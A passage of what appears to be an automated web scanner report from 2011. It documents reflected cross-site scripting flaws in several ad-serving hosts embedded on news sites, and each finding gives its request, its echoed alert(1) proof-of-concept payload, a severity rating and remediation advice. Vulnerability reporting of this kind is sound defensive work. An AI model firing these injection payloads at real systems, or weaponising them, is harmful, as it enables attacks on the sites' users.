GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=42375771675<script>alert(1)</script>d3c41350c71&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:53 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2950


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "42375771675<script>alert(1)</script>d3c41350c71"

   
                                                           </head>
...[SNIP]...

1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 306f0--><script>alert(1)</script>135101e601a was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891306f0--><script>alert(1)</script>135101e601a&pid=423757&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:51 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3315


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1486891306f0--><script>alert(1)</script>135101e601a" -->
...[SNIP]...

1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4ce19--><script>alert(1)</script>f8c3628d761 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=423757&ps=-14ce19--><script>alert(1)</script>f8c3628d761&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3754


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14ce19--><script>alert(1)</script>f8c3628d761" -->
   
...[SNIP]...

1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fbf"-alert(1)-"b5702b8b71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1209091&e3fbf"-alert(1)-"b5702b8b71e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:30 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=300x250&e3fbf"-alert(1)-"b5702b8b71e=1&s=1209091&_salt=1090008792";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f954"%3balert(1)//0685f976cd0 was submitted in the flash parameter. This input was echoed as 1f954";alert(1)//0685f976cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=101f954"%3balert(1)//0685f976cd0&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=101f954";alert(1)//0685f976cd0&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.41. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f096"%3balert(1)//da375838548 was submitted in the r parameter. This input was echoed as 3f096";alert(1)//da375838548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.83308077603578573f096"%3balert(1)//da375838548 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.83308077603578573f096";alert(1)//da375838548&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bebe2"-alert(1)-"8184f578ad5 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.43. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b81e"%3balert(1)//6be3b67e9ff was submitted in the time parameter. This input was echoed as 7b81e";alert(1)//6be3b67e9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-57b81e"%3balert(1)//6be3b67e9ff&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-57b81e";alert(1)//6be3b67e9ff&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...

1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479b2'%3balert(1)//4fedd6f1f24 was submitted in the admeld_adprovider_id parameter. This input was echoed as 479b2';alert(1)//4fedd6f1f24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567479b2'%3balert(1)//4fedd6f1f24&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567479b2';alert(1)//4fedd6f1f24&external_user_id=0&expiration=1305131482"/>');

1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95419'%3balert(1)//eb12da10d08 was submitted in the admeld_callback parameter. This input was echoed as 95419';alert(1)//eb12da10d08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95419'%3balert(1)//eb12da10d08 HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95419';alert(1)//eb12da10d08?admeld_adprovider_id=567&external_user_id=0&expiration=1305131482"/>');

1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c58a'-alert(1)-'95756830280 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x903c58a'-alert(1)-'95756830280&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:49 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x903c58a'-alert(1)-'95756830280&inv_code=1836970&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x903c58a%27-alert%281%29-%2795756830280%26section%3D1836970%26
...[SNIP]...

1.47. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5742'-alert(1)-'b8bc09776c7 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970c5742'-alert(1)-'b8bc09776c7&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:53 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970c5742'-alert(1)-'b8bc09776c7&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970c5742%27-alert%281%29-%27b8bc09776c7%26referrer%3Dhttp%3
...[SNIP]...

1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de2c'-alert(1)-'6b2a2793137 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:20:17 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137">
...[SNIP]...

1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d43'%3balert(1)//82d6def5476 was submitted in the mpvc parameter. This input was echoed as 20d43';alert(1)//82d6def5476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f20d43'%3balert(1)//82d6def5476 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
